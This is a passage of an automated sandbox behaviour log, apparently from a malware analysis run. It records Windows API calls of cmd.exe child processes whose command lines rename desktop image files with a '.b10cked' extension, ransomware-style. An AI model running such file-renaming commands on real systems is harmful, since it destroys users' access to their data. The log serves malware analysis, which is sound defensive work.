lpFindFileData=0x16f604 | out: lpFindFileData=0x16f604) returned 0x2ffff0 [0220.758] FindClose (in: hFindFile=0x2ffff0 | out: hFindFile=0x2ffff0) returned 1 [0220.758] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.758] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.758] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.758] GetEnvironmentStringsW () returned 0x302ad0* [0220.758] FreeEnvironmentStringsW (penv=0x302ad0) returned 1 [0220.758] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.759] GetConsoleOutputCP () returned 0x1b5 [0220.759] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.759] GetUserDefaultLCID () returned 0x409 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9c8, cchData=128 | out: lpLCData="0") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9c8, cchData=128 | out: lpLCData="0") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9c8, cchData=128 | out: lpLCData="1") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.760] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.760] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.761] GetConsoleTitleW (in: lpConsoleTitle=0x2f08c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.761] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.761] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.761] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.762] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.762] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.762] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.762] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.762] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.762] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.762] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.765] GetConsoleTitleW (in: lpConsoleTitle=0x16f6c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.765] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.765] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.765] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.765] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.765] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.765] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.766] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.766] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.766] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.766] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.766] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.766] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.766] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.766] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.766] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.766] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.766] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.766] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.766] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.766] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.766] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.766] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.766] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.766] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.766] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.766] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.766] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.766] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.766] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f47c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f474, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f474*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.768] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.769] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.769] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.769] _wcsicmp (_String1="95ICX9~1.BMP", _String2=".") returned 11 [0220.769] _wcsicmp (_String1="95ICX9~1.BMP", _String2="..") returned 11 [0220.769] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9~1.bmp")) returned 0x20 [0220.769] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301d38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.769] SetErrorMode (uMode=0x0) returned 0x0 [0220.770] SetErrorMode (uMode=0x1) returned 0x0 [0220.770] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", nBufferLength=0x104, lpBuffer=0x16ee04, lpFilePart=0x16edec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", lpFilePart=0x16edec*="95ICX9~1.BMP") returned 0x25 [0220.770] SetErrorMode (uMode=0x0) returned 0x1 [0220.770] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.770] _wcsicmp (_String1="95ICX9~1.BMP", _String2=".") returned 11 [0220.770] _wcsicmp (_String1="95ICX9~1.BMP", _String2="..") returned 11 [0220.770] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9~1.bmp")) returned 0x20 [0220.770] SetErrorMode (uMode=0x0) returned 0x0 [0220.770] SetErrorMode (uMode=0x1) returned 0x0 [0220.770] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", nBufferLength=0x104, lpBuffer=0x16f280, lpFilePart=0x16f018 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", lpFilePart=0x16f018*="95ICX9~1.BMP") returned 0x25 [0220.770] SetErrorMode (uMode=0x0) returned 0x1 [0220.770] SetErrorMode (uMode=0x0) returned 0x0 [0220.770] SetErrorMode (uMode=0x1) returned 0x0 [0220.770] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x16f488, lpFilePart=0x16f018 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", lpFilePart=0x16f018*="95ICx9P6yb.bmp.b10cked") returned 0x2f [0220.770] SetErrorMode (uMode=0x0) returned 0x1 [0220.770] SetLastError (dwErrCode=0x0) [0220.770] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp.b10cked")) returned 0xffffffff [0220.770] GetLastError () returned 0x2 [0220.771] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x16e994, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e994) returned 0x2f0ee0 [0220.771] FindNextFileW (in: hFindFile=0x2f0ee0, lpFindFileData=0x16e994 | out: lpFindFileData=0x16e994) returned 0 [0220.771] GetLastError () returned 0x12 [0220.771] FindClose (in: hFindFile=0x2f0ee0 | out: hFindFile=0x2f0ee0) returned 1 [0220.772] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICX9~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x301ad8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301ad8) returned 0x2f0ee0 [0220.772] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x16ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked", lpFilePart=0x0) returned 0x2f [0220.772] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp", nBufferLength=0x104, lpBuffer=0x16ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp", lpFilePart=0x0) returned 0x27 [0220.772] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp")) returned 0x20 [0220.772] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\95ICx9P6yb.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\95icx9p6yb.bmp.b10cked"), dwFlags=0x3) returned 1 [0220.773] FindClose (in: hFindFile=0x2f0ee0 | out: hFindFile=0x2f0ee0) returned 1 [0220.773] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ebe0 | out: _Buffer=" 1") returned 9 [0220.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.773] GetFileType (hFile=0x7) returned 0x2 [0222.930] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.930] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16eb6c | out: lpMode=0x16eb6c) returned 1 [0222.930] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16eba0 | out: lpConsoleScreenBufferInfo=0x16eba0) returned 1 [0222.930] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.931] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x16ebe0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.931] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ebc4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x16ebc4*=0x1a) returned 1 [0222.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.931] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.931] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.931] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.931] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.932] SetConsoleInputExeNameW () returned 0x1 [0222.932] GetConsoleOutputCP () returned 0x1b5 [0222.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.932] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.932] exit (_Code=0) Process: id = "574" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xea4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32904 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32905 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32906 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32907 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 32908 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32909 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32910 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32911 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32912 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32913 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33046 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33047 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33048 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33049 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 33050 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 33051 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33052 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33053 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33054 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33055 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33056 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33057 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33058 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33059 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33070 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 33071 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33072 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33073 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33074 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33075 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33076 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33077 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 33078 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 33079 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 778 os_tid = 0xd48 [0220.171] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f85c | out: lpSystemTimeAsFileTime=0x20f85c*(dwLowDateTime=0xb8076ca0, dwHighDateTime=0x1d440a9)) [0220.171] GetCurrentProcessId () returned 0xea4 [0220.171] GetCurrentThreadId () returned 0xd48 [0220.171] GetTickCount () returned 0x3d74b [0220.171] QueryPerformanceCounter (in: lpPerformanceCount=0x20f854 | out: lpPerformanceCount=0x20f854*=27696069200) returned 1 [0220.172] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.172] __set_app_type (_Type=0x1) [0220.172] __p__fmode () returned 0x76b331f4 [0220.172] __p__commode () returned 0x76b331fc [0220.173] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.173] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.173] GetCurrentThreadId () returned 0xd48 [0220.173] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd48) returned 0x38 [0220.173] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.173] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.173] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.174] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7ec | out: phkResult=0x20f7ec*=0x0) returned 0x2 [0220.174] VirtualQuery (in: lpAddress=0x20f823, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.174] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7bc, dwLength=0x1c | out: lpBuffer=0x20f7bc*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0220.175] GetConsoleOutputCP () returned 0x1b5 [0220.175] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.175] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.175] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.175] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.176] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.177] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.177] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.177] GetConsoleMode (in: 